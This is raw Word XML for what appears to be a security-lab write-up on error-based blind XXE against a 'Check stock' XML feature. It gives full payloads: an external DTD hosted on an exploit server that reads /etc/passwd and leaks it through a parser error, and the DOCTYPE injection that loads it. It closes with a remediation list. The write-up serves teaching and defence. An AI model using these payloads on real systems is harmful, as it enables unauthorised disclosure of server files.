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91C" w14:textId="1FC5D7A4" w:rsidR="00320924" w:rsidRDefault="009F1CCE" w:rsidP="00B36D89">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2844B8C2" w14:textId="3B6ABDC4" w:rsidR="00B36D89" w:rsidRPr="00EC3CC6" w:rsidRDefault="002D4948" w:rsidP="00A45757">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application </w:t>
      </w:r>
      <w:r w:rsidR="00A45757">
        <w:t xml:space="preserve">has a "Check stock" feature that parses XML input but does not display the result. We will use an external DTD to trigger an error message that displays the contents of the </w:t>
      </w:r>
      <w:r w:rsidR="00A45757" w:rsidRPr="00CF7A44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A45757" w:rsidRPr="00CF7A44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A45757" w:rsidRPr="00CF7A44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
      <w:r w:rsidR="00A45757">
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r w:rsidR="005E3653">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5364B1E4" w14:textId="77777777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43CB22" w14:textId="427C8B32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1CB7B99E" w14:textId="7A6BDDEC" w:rsidR="00A0135C" w:rsidRDefault="00152623" w:rsidP="00455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 the web application and visit any product page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B241700" w14:textId="700C3741" w:rsidR="00CB17DB" w:rsidRDefault="00CB17DB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Send a Check Stock request and intercept the POST request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Proxy tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F1EFEB" w14:textId="7C2CB5AC" w:rsidR="00146D95" w:rsidRDefault="00146D95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Go to the exploit server and inject the Payload 1 into the file name field and Payload 2 into the body field of the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6705C50C" w14:textId="625D593A" w:rsidR="00676748" w:rsidRDefault="00676748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the Stock Check request try to study it and based on that we will craft an exploit accordingly and replace the XML data with our Payload 3 and send the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553ADDA" w14:textId="46910823" w:rsidR="00E1363A" w:rsidRDefault="004F232A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Replace the XML body of the request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 with the Payload</w:t>
      </w:r>
      <w:r w:rsidR="007F52EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and send the request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94D30C3" w14:textId="26215F19" w:rsidR="0058146F" w:rsidRPr="00E1363A" w:rsidRDefault="005F5B9D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the response we g</w:t>
      </w:r>
      <w:r w:rsidR="0023054A"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lang w:val="en-US"/>
        </w:rPr>
        <w:t>t the entire content of the desired file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18405899" w14:textId="77777777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C86D1A" w14:textId="5DAB2FEB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8BCAABD" w14:textId="7E3AA26B" w:rsidR="00595F51" w:rsidRDefault="00F14089" w:rsidP="00305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14089">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/exploit.dtd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625A1026" w14:textId="77777777" w:rsidR="003B315E" w:rsidRPr="003B315E" w:rsidRDefault="003B315E" w:rsidP="003B3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B315E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;!ENTITY % file SYSTEM "file:///etc/passwd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342A6F5A" w14:textId="77777777" w:rsidR="003B315E" w:rsidRPr="003B315E" w:rsidRDefault="003B315E" w:rsidP="003B31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B315E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;!ENTITY % eval "&lt;!ENTITY &amp;#x25; exfil SYSTEM 'file:///invalid/%file;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFE9899" w14:textId="77777777" w:rsidR="003B315E" w:rsidRPr="003B315E" w:rsidRDefault="003B315E" w:rsidP="003B31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B315E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%eval;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364A8B3F" w14:textId="77777777" w:rsidR="004214CD" w:rsidRDefault="003B315E" w:rsidP="004214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B315E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%exfil;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438F5EAB" w14:textId="3216F890" w:rsidR="00CA16B0" w:rsidRPr="00630668" w:rsidRDefault="00630668" w:rsidP="003B3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30668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [&lt;!ENTITY % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00630668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630668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "https://exploit-0abc001c0301917081e1d95d01420023.exploit-server.net/exploit.dtd"&gt; %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00630668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630668">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E739F1" w14:textId="77777777" w:rsidR="00760ECD" w:rsidRDefault="00760ECD" w:rsidP="00760ECD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CCF8D0" w14:textId="5DF26A5C" w:rsidR="00595F51" w:rsidRDefault="00595F51" w:rsidP="00760ECD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F383A91" w14:textId="77777777" w:rsidR="00F76991" w:rsidRPr="00F76991" w:rsidRDefault="00F76991" w:rsidP="00F76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76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Disable External Entity Processing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The first and foremost measure to prevent XXE attacks is to configure your XML parser to not process </w:t>
      </w:r>
      <w:r w:rsidRPr="00F76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>external entities. This can be accomplished through configuration settings specific to the library being used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2B97AD" w14:textId="77777777" w:rsidR="00F76991" w:rsidRPr="00F76991" w:rsidRDefault="00F76991" w:rsidP="00F76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76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reject Unnecessary Document Types:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> If your application does not need to process document types, ensure they're blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0266C13C" w14:textId="77777777" w:rsidR="00F76991" w:rsidRPr="00F76991" w:rsidRDefault="00F76991" w:rsidP="00F76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76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Update XML Parsers:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Many modern XML parsers are configured to be secure against XXE attacks by default. Ensure your XML libraries and parsers are always up-to-date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0FD82A" w14:textId="77777777" w:rsidR="00F76991" w:rsidRPr="00F76991" w:rsidRDefault="00F76991" w:rsidP="00F76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76991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Less Complex Data Formats:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> If XML isn’t strictly necessary, consider using simpler formats like JSON, which don't have the capability of defining entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E49408" w14:textId="77777777" w:rsidR="00F76991" w:rsidRPr="00F76991" w:rsidRDefault="00F76991" w:rsidP="00F76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76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Whitelist Input:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Accept only known good input. If certain XML structures are expected, validate incoming XML against a schema (XSD).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010FE069" w14:textId="77777777" w:rsidR="00F76991" w:rsidRPr="00F76991" w:rsidRDefault="00F76991" w:rsidP="00F76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76991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Content Filtering:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the application needs to accept XML input, ensure that you filter incoming XML documents to prevent any document type declarations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5920C607" w14:textId="77777777" w:rsidR="00F76991" w:rsidRPr="00F76991" w:rsidRDefault="00F76991" w:rsidP="00F76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76991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Dependency Checkers:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> There are tools that will scan project dependencies for known vulnerabilities. If you're building a Java application, the OWASP Dependency-Check can identify libraries that have known XXE vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5959E8FD" w14:textId="77777777" w:rsidR="00F76991" w:rsidRPr="00F76991" w:rsidRDefault="00F76991" w:rsidP="00F76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76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error Handling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Do not reveal the internal information in error messages. Avoid stack traces that leak path or file information, and ensure exceptions return generic error messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694C0D2C" w14:textId="77777777" w:rsidR="00F76991" w:rsidRPr="00F76991" w:rsidRDefault="00F76991" w:rsidP="00F76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76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access Control:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Limit the privileges of the account that processes XML in case it's compromised. This will make it harder for an attacker to make the parser read critical system files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C8CBB" w14:textId="31B993F1" w:rsidR="00595F51" w:rsidRPr="00F76991" w:rsidRDefault="00F76991" w:rsidP="00E83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76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network Restrictions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F76991">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Restrict outbound traffic from the server, especially on ports that are not necessary. This helps in reducing the impact of certain out-of-band XXE attacks.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00595F51" w:rsidRPr="00F76991" w:rsidSect="0058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188D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40CA1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C44"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A8F2CEDA"/>
    <w:lvl w:ilvl="0" w:tplc="E8021A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84E4B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B87AB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1290">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1210191738">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="55477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DD"/>
    <w:rsid w:val="00005A2B"/>
    <w:rsid w:val="00050702"/>
    <w:rsid w:val="00050FA0"/>
    <w:rsid w:val="001464DE"/>
    <w:rsid w:val="00146D95"/>
    <w:rsid w:val="00152623"/>
    <w:rsid w:val="00172267"/>
    <w:rsid w:val="001D4955"/>
    <w:rsid w:val="0023054A"/>
    <w:rsid w:val="002D4948"/>
    <w:rsid w:val="0030568B"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003B315E"/>
    <w:rsid w:val="003D0738"/>
    <w:rsid w:val="003D6F3C"/>
    <w:rsid w:val="004214CD"/>
    <w:rsid w:val="00455916"/>
    <w:rsid w:val="00470E74"/>
    <w:rsid w:val="004F232A"/>
    <w:rsid w:val="0053631B"/>
    <w:rsid w:val="0058146F"/>
    <w:rsid w:val="00586A86"/>
    <w:rsid w:val="00595F51"/>
    <w:rsid w:val="005D3446"/>
    <w:rsid w:val="005E3653"/>
    <w:rsid w:val="005E4E23"/>
    <w:rsid w:val="005F5B9D"/>
    <w:rsid w:val="00630668"/>
    <w:rsid w:val="006706BD"/>
    <w:rsid w:val="00676748"/>
    <w:rsid w:val="006E1C83"/>
    <w:rsid w:val="006F6440"/>
    <w:rsid w:val="00760ECD"/>
    <w:rsid w:val="007649DD"/>
    <w:rsid w:val="007F52EB"/>
    <w:rsid w:val="008061DC"/>
    <w:rsid w:val="009F1CCE"/>
    <w:rsid w:val="009F6B4D"/>
    <w:rsid w:val="00A0135C"/>
    <w:rsid w:val="00A45143"/>
    <w:rsid w:val="00A45757"/>
    <w:rsid w:val="00A672AA"/>
    <w:rsid w:val="00B36D89"/>
    <w:rsid w:val="00B45E18"/>
    <w:rsid w:val="00C36F78"/>
    <w:rsid w:val="00C6154A"/>
    <w:rsid w:val="00C77580"/>
    <w:rsid w:val="00CA16B0"/>
    <w:rsid w:val="00CB17DB"/>
    <w:rsid w:val="00CC224F"/>
    <w:rsid w:val="00CE0A2A"/>
    <w:rsid w:val="00CF7A44"/>
    <w:rsid w:val="00DC6F94"/>
    <w:rsid w:val="00DE3034"/>
    <w:rsid w:val="00E1363A"/>
    <w:rsid w:val="00EC3CC6"/>
    <w:rsid w:val="00F14089"/>
    <w:rsid w:val="00F7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E43"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{61D4380F-4A9B-4EAE-B2F3-FCA29CB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CD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D89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36D89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E4E2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E4E2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559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ECD"/>
    <w:rPr>
      <w:rFonts w:ascii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17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-03T06:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-06T11:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>